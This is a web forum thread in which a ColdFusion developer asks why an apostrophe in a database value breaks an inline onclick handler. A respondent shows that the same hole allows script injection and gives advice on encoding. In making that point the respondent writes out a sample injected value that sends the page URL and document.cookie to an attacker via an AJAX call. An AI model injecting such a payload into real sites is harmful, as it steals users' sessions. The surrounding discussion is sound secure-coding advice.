Tek-Tips is the largest IT community on the Internet today!

Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!

  • Congratulations Chris Miller on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!

Single quote is breaking my onclick action 1

Status
Not open for further replies.

LyndonOHRC

Programmer
Sep 8, 2005
603
US
I'm trying to populate an input tag when text is clicked. It works great until the data contains an apostrophe. i.e. The value (DANCER'S CALL) is placed in the function dynamically by my server side database code. I'm having trouble figuring out how to solve the unbalanced delimiters this scenario presents. Any Help appreciated.

Code:
onclick='document.getElementById("HorseName").value="DANCER'S CALL";
document.getElementById("HorseName").focus();'

In case it helps, here's the ColdFusion Server side code that builds the onclick action:

Code:
<span onclick='document.getElementById("HorseName").value="#getHName.hname#";document.getElementById("HorseName").focus();'>
[indent]#getHName.hname#[/indent]
</span>




Lyndon
 
Hi

And if getHName.hname's value is [tt]";$.get("[ignore][/ignore]",{"u":location.href,"c":document.cookie});//[/tt], then your side will obediently send the URL and cookies to an attacker ?

According to the documentation you should use [tt]encodeForHTML()[/tt]. I guess somehow like this :
Code:
<span onclick='document.getElementById("HorseName").value="#encodeForHTML(getHName.hname)#";document.getElementById("HorseName").focus();'>
#encodeForHTML(getHName.hname)#
</span>

Feherke.
feherke.github.io
 
Security: The dynamic value can only be a horse name from our internal database. And application is not available to the public.

We use ColdFusion 9 and the encodeForHTML is not available, sorry I didn't think to post version.

I even tried passing the horse name to a function, no luck [mad]

Code:
function putHName(hname) {
			document.getElementById("HorseName").value=hname;
			document.getElementById('HorseName').focus();
		}

Lyndon
 
Hi

No problem, I have absolutely no idea about ColdFusion or its versions. This is a generic issue and should be addressed regardless language, version, data source or site accessibility.

Thought there is a chance ColdFusion's function to not encode the single quote too. So go the manual way, and replace "'" with "&apos;" in getHName.hname.


Feherke.
feherke.github.io
 
Status
Not open for further replies.

Part and Inventory Search

Sponsor

Back
Top